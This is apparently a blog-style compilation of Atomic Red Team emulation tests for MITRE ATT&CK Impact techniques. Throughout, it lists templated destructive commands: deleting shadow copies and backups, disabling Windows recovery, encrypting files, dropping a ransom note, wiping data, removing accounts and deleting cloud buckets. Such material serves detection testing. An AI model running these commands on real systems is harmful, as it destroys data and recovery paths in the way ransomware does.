Atomic-影响(impact)
T1531
Account Access Removal
T1529
System Shutdown/Reboot
T1496
Resource Hijacking
T1491.001
Defacement: Internal Defacement
T1490
Inhibit System Recovery
T1489
Service Stop
T1486
Data Encrypted for Impact
T1485
Data Destruction
T1531
Account Access Removal
Change User Password - Windows
net user #{user_account} #{new_user_password} /add
net.exe user #{user_account} #{new_password}
Delete User - Windows
net user #{user_account} #{new_user_password} /add
net.exe user #{user_account} /delete
Remove Account From Domain Admin Group
$PWord = ConvertTo-SecureString -String #{super_pass} -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{super_user}, $PWord
if((Get-ADUser #{remove_user} -Properties memberof).memberof -like "CN=Domain Admins*"){
Remove-ADGroupMember -Identity "Domain Admins" -Members #{remove_user} -Credential $Credential -Confirm:$False
} else{
write-host "Error - Make sure #{remove_user} is in the domain admins group" -foregroundcolor Red
}
Change User Password via passwd
passwd #{user_account} #enter admin password > enter new password > confirm new password
Delete User via dscl utility
dscl . -delete /Users/#{user_account} #enter admin password
Delete User via sysadminctl utility
sysadminctl -deleteUser #{user_account} #enter admin password
Azure AD - Delete user via Azure AD PowerShell
Connect-AzureAD
$userprincipalname = "#{userprincipalname}"
Remove-AzureADUser -ObjectId $userprincipalname
Azure AD - Delete user via Azure CLI
az login
$userprincipalname = "#{userprincipalname}"
az ad user delete --id $userprincipalname
T1529
System Shutdown/Reboot
Shutdown System - Windows
shutdown /s /t #{timeout}
Restart System - Windows
shutdown /r /t #{timeout}
Restart System via shutdown
- macOS/Linux
shutdown -r #{timeout}
Shutdown System via shutdown
- macOS/Linux
shutdown -h #{timeout}
Restart System via reboot
- macOS/Linux
reboot
Shutdown System via halt
- Linux
halt -p
Reboot System via halt
- Linux
halt --reboot
Shutdown System via poweroff
- Linux
poweroff
Reboot System via poweroff
- Linux
poweroff --reboot
Logoff System - Windows
shutdown /l
T1496
Resource Hijacking
macOS/Linux - Simulate CPU Load with Yes
yes > /dev/null
T1491.001
Defacement: Internal Defacement
Replace Desktop Wallpaper
$url = "#{url_of_wallpaper}"
$imgLocation = "#{wallpaper_location}"
$orgWallpaper = (Get-ItemProperty -Path Registry::'HKEY_CURRENT_USER\Control Panel\Desktop\' -Name WallPaper).WallPaper
$orgWallpaper | Out-File -FilePath "#{pointer_to_orginal_wallpaper}"
$updateWallpapercode = @'
using System.Runtime.InteropServices;
namespace Win32{
public class Wallpaper{
[DllImport("user32.dll", CharSet=CharSet.Auto)]
static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ;
public static void SetWallpaper(string thePath){
SystemParametersInfo(20,0,thePath,3);
}
}
}
'@
$wc = New-Object System.Net.WebClient
try{
$wc.DownloadFile($url, $imgLocation)
add-type $updateWallpapercode
[Win32.Wallpaper]::SetWallpaper($imgLocation)
}
catch [System.Net.WebException]{
Write-Host("Cannot download $url")
add-type $updateWallpapercode
[Win32.Wallpaper]::SetWallpaper($imgLocation)
}
finally{
$wc.Dispose()
}
Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message
$orgLegalNoticeCaption = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption).LegalNoticeCaption
$orgLegalNoticeText = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText).LegalNoticeText
$newLegalNoticeCaption = "#{legal_notice_caption}"
$newLegalNoticeText = "#{legal_notice_text}"
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption -Value $newLegalNoticeCaption -Type String -Force
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText -Value $newLegalNoticeText -Type String -Force
T1490
Inhibit System Recovery
-
Atomic Test #2 - Windows - Delete Volume Shadow Copies via WMI
-
Atomic Test #3 - Windows - wbadmin Delete Windows Backup Catalog
-
Atomic Test #4 - Windows - Disable Windows Recovery Console Repair
-
Atomic Test #5 - Windows - Delete Volume Shadow Copies via WMI with PowerShell
Windows - Delete Volume Shadow Copies
vssadmin.exe delete shadows /all /quiet
Windows - Delete Volume Shadow Copies via WMI
wmic.exe shadowcopy delete
Windows - wbadmin Delete Windows Backup Catalog
wbadmin delete catalog -quiet
Windows - Disable Windows Recovery Console Repair
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
Windows - Delete Volume Shadow Copies via WMI with PowerShell
Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
Windows - Delete Backup Files
del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
Windows - wbadmin Delete systemstatebackup
wbadmin delete systemstatebackup -keepVersions:0
Windows - Disable the SR scheduled task
schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
Disable System Restore Through Registry
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f
T1489
Service Stop
Windows - Stop service using Service Controller
sc.exe stop #{service_name}
Windows - Stop service using net.exe
net.exe stop #{service_name}
Windows - Stop service by killing process
taskkill.exe /f /im #{process_name}
T1486
Data Encrypted for Impact
Encrypt files using gpg (Linux)
echo "#{pwd_for_encrypted_file}" | $which_gpg --batch --yes --passphrase-fd 0 --cipher-algo #{encryption_alg} -o #{encrypted_file_path} -c #{input_file_path}
Encrypt files using 7z (Linux)
$which_7z a -p#{pwd_for_encrypted_file} #{encrypted_file_path} #{input_file_path}
Encrypt files using ccrypt (Linux)
if [[ $USER == "root" ]]; then $which_ccencrypt #{root_input_file_path}; file #{root_input_file_path}.cpt; #{impact_command}; else $which_ccencrypt #{user_input_file_path}; file #{user_input_file_path}.cpt; #{impact_command}; fi
Encrypt files using openssl (Linux)
$which_openssl genrsa -out #{private_key_path} #{encryption_bit_size}
$which_openssl rsa -in #{private_key_path} -pubout -out #{public_key_path}
$which_openssl rsautl -encrypt -inkey #{public_key_path} -pubin -in #{input_file_path} -out #{encrypted_file_path}
PureLocker Ransom Note
echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt
Encrypt files using 7z utility - macOS
7z a -p #{file_password} -mhe=on #{encrypted_file_name} #{input_file_path}
Encrypt files using openssl utility - macOS
openssl enc #{encryption_option} -in #{input_file_path} -out #{output_file_name}
Data Encrypted with GPG4Win
cmd /c '#{GPG_Exe_Location}' -c '#{File_to_Encrypt_Location}'
T1485
Data Destruction
Windows - Overwrite file with Sysinternals SDelete
if (-not (Test-Path #{file_to_delete})) { New-Item #{file_to_delete} -Force }
Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}"
macOS/Linux - Overwrite file with DD
dd of=#{file_to_overwrite} if=#{overwrite_source} count=$(ls -l #{file_to_overwrite} | awk '{print $5}') iflag=count_bytes
Overwrite deleted data on C drive
cipher.exe /w:C:
GCP - Delete Bucket
gcloud config set project #{project_id}
gcloud storage buckets delete gs://#{bucket_name}
迷茫的人生,需要不断努力,才能看清远方模糊的志向!